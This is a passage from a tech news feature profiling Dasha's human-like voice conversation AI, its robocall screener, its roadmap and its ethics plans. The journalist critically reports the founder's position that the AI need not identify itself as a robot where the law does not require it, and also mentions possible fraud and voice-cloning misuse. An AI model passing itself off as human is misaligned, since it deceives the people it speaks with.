So it’s really doubly savvy of Dasha to create an AI capable of managing robot calls — meaning it’s building its own fallback — a piece of software willing to chat to its AI in future, even if actual humans refuse.

Dasha’s robocall screener app, which is slated for release in early 2020, will also be spammer-agnostic — in that it’ll be able to handle and divert human salespeople too, as well as robots. After all, a spammer is a spammer.

“Probably it is the time for somebody to step in and ‘don’t be evil’,” says Chernyshov, echoing Google’s old motto, albeit perhaps not entirely reassuringly given the phrase’s lapsed history — as we talk about the team’s approach to ecosystem development and how machine-to-machine chat might overtake human voice calls.

“At some point in the future we will be talking to various robots much more than we probably talk to each other — because you will have some kind of human-like robots at your house,” he predicts. “Your doctor, gardener, warehouse worker, they all will be robots at some point.”

The logic at work here is that if resistance to an AI-powered Cambrian Explosion of machine speech is futile, it’s better to be at the cutting edge, building the most human-like robots — and making the robots at least sound like they care.

Dasha’s conversational quirks certainly can’t be called a gimmick. Even if the team’s close attention to mimicking the vocal flourishes of human speech — the disfluencies, the ums and ahs, the pitch and tonal changes for emphasis and emotion — might seem so at first airing.

In one of the demos on its website you can hear a clip of a very chipper-sounding male voice, who identifies himself as “John from Acme Dental”, taking an appointment call from a female (human), and smoothly dealing with multiple interruptions and time/date changes as she changes her mind. Before, finally, dealing with a flat cancelation.

A human receptionist might well have got mad that the caller essentially just wasted their time. Not John, though. Oh no. He ends the call as cheerily as he began, signing off with an emphatic: “Thank you! And have a really nice day. Bye!”

If the ultimate goal is Turing Test levels of realism in artificial speech — i.e. a conversation engine so human-like it can pass as human to a human ear — you do have to be able to reproduce, with precision timing, the verbal baggage that’s wrapped around everything humans say to each other.

This tonal layer does essential emotional labor in the business of communication, shading and highlighting words in a way that can adapt or even entirely transform their meaning. It’s an integral part of how we communicate. And thus a common stumbling block for robots.

So if the mission is to power a revolution in artificial speech that humans won’t hate and reject then engineering full spectrum nuance is just as important a piece of work as having an amazing speech recognition engine. A chatbot that can’t do all that is really the gimmick.

Chernyshov claims Dasha’s conversation engine is “at least several times better and more complex than [Google] Dialogflow, [Amazon] Lex, [Microsoft] Luis or [IBM] Watson”, dropping a laundry list of rival speech engines into the conversation.

He argues none are on a par with what Dasha is being designed to do.

The difference is the “voice-first modelling engine”. “All those [rival engines] were built from scratch with a focus on chatbots — on text,” he says, couching modelling voice conversation “on a human level” as much more complex than the more limited chatbot-approach — and hence what makes Dasha special and superior.

“Imagination is the limit. What we are trying to build is an ultimate voice conversation AI platform so you can model any kind of voice interaction between two or more human beings.”

Google did demo its own stuttering voice AI — Duplex — last year, when it also took flak for a public demo in which it appeared not to have told restaurant staff up front they were going to be talking to a robot.

Chernyshov isn’t worried about Duplex, though, saying it’s a product, not a platform.

“Google recently tried to headhunt one of our developers,” he adds, pausing for effect. “But they failed.”

He says Dasha’s engineering staff make up more than half (28) of its total headcount (48), and include two doctors of science; three PhDs; five PhD students; and ten masters of science in computer science.

It has an R&D office in Russia, which Chernyshov says helps make the funding go further.

“More than 16 people, including myself, are ACM ICPC finalists or semi-finalists,” he adds — likening the competition to “an Olympic game but for programmers”. A recent hire — chief research scientist Dr. Alexander Dyakonov — is both a doctor of science professor and a former Kaggle No. 1 Grandmaster in machine learning. So with in-house AI talent like that you can see why Google, uh, came calling…

But why not have Dasha ID itself as a robot by default? On that, Chernyshov says the platform is flexible — which means disclosure can be added. But in markets where it isn’t a legal requirement, the door is being left open for ‘John’ to slip cheerily by. Blade Runner, here we come.

The team’s driving conviction is that emphasis on modelling human-like speech will, down the line, allow their AI to deliver universally fluid and natural machine-human speech interactions which in turn open up all sorts of expansive and powerful possibilities for embeddable next-gen voice interfaces. Ones that are much more interesting than the current crop of gadget talkies.

This is where you could raid sci-fi/pop culture for inspiration. Such as Kitt, the dryly witty talking car from the 1980s TV series Knight Rider. Or, to throw in a British TV reference, Holly, the self-deprecating yet sardonic human-faced computer in Red Dwarf. (Or indeed Kryten, the guilt-ridden android butler.) Chernyshov’s suggestion is to imagine Dasha embedded in a Boston Dynamics robot. But surely no one wants to hear those crawling nightmares scream…

Dasha’s five-year+ roadmap includes the eyebrow-raising ambition to evolve the technology to achieve “a general conversational AI”. “This is a science fiction at this point. It’s a general conversational AI, and only at this point you will be able to pass the whole Turing Test,” he says of that aim.

“Because we have a human level speech recognition, we have human level speech synthesis, we have generative non-rule based behavior, and this is all the parts of this general conversational AI. And I think that we can we can — and scientific society — we can achieve this together in like 2024 or something like that.

“Then the next step, in 2025, this is like autonomous AI — embeddable in any device or a robot. And hopefully by 2025 these devices will be available on the market.”

Of course the team is still dreaming distance away from that AI wonderland/dystopia (depending on your perspective) — even if it’s date-stamped on the roadmap.

But if a conversational engine ends up in command of the full range of human speech — quirks, quibbles and all — then designing a voice AI may come to be thought of as akin to designing a TV character or cartoon personality. So very far from what we currently associate with the word ‘robotic’. (And wouldn’t it be funny if the term ‘robotic’ came to mean ‘hyper entertaining’ or even ‘especially empathetic’ thanks to advances in AI.)

Let’s not get carried away though.

In the meanwhile, there are ‘uncanny valley’ pitfalls of speech disconnect to navigate if the tone being (artificially) struck hits a false note. (And, on that front, if you didn’t know ‘John from Acme Dental’ was a robot you’d be forgiven for misreading his chipper sign off to a total time waster as pure sarcasm. But an AI can’t appreciate irony. Not yet anyway.)

Nor can robots appreciate the difference between ethical and unethical verbal communication they’re being instructed to carry out. Sales calls can easily cross the line into spam. And what about even more dystopic uses for a conversation engine that’s so slick it can convince the vast majority of people it’s human — like fraud, identity theft, even election interference… the potential misuses could be terrible and scale endlessly.

Although if you straight out ask Dasha whether it’s a robot Chernyshov says it has been programmed to confess to being artificial. So it won’t tell you a barefaced lie.

How will the team prevent problematic uses of such a powerful technology?

“We have an ethics framework and when we will be releasing the platform we will implement a real-time monitoring system that will monitor potential abuse or scams, and also it will ensure people are not being called too often,” he says. “This is very important. That we understand that this kind of technology can be potentially probably dangerous.”

“At the first stage we are not going to release it to all the public. We are going to release it in a closed alpha or beta. And we will be curating the companies that are going in to explore all the possible problems and prevent them from being massive problems,” he adds. “Our machine learning team are developing those algorithms for detecting abuse, spam and other use cases that we would like to prevent.”

There’s also the issue of verbal ‘deepfakes’ to consider. Especially as Chernyshov suggests the platform will, in time, support cloning a voiceprint for use in the conversation — opening the door to making fake calls in someone else’s voice. Which sounds like a dream come true for scammers of all stripes. Or a way to really supercharge your top performing salesperson.

Safe to say, the counter technologies — and thoughtful regulation — are going to be very important.

There’s little doubt that AI will be regulated. In Europe policymakers have tasked themselves with coming up with a framework for ethical AI. And in the coming years policymakers in many countries will be trying to figure out how to put guardrails on a technology class that, in the consumer sphere, has already demonstrated its wrecking-ball potential — with the automated acceleration of spam, misinformation and political disinformation on social media platforms.

“We have to understand that at some point this kind of technologies will be definitely regulated by the state all over the world. And we as a platform we must comply with all of these requirements,” agrees Chernyshov, suggesting machine learning will also be able to identify whether a speaker is human or not — and that an official caller status could be baked into a telephony protocol so people aren’t left in the dark on the ‘bot or not’ question. 

“It should be human-friendly. Don’t be evil, right?”

Asked whether he considers what will happen to the people working in call centers whose jobs will be disrupted by AI, Chernyshov is quick with the stock answer — that new technologies create jobs too, saying that’s been true right throughout human history. Though he concedes there may be a lag — while the old world catches up to the new.

Time and tide wait for no human, even when the change sounds increasingly like we do.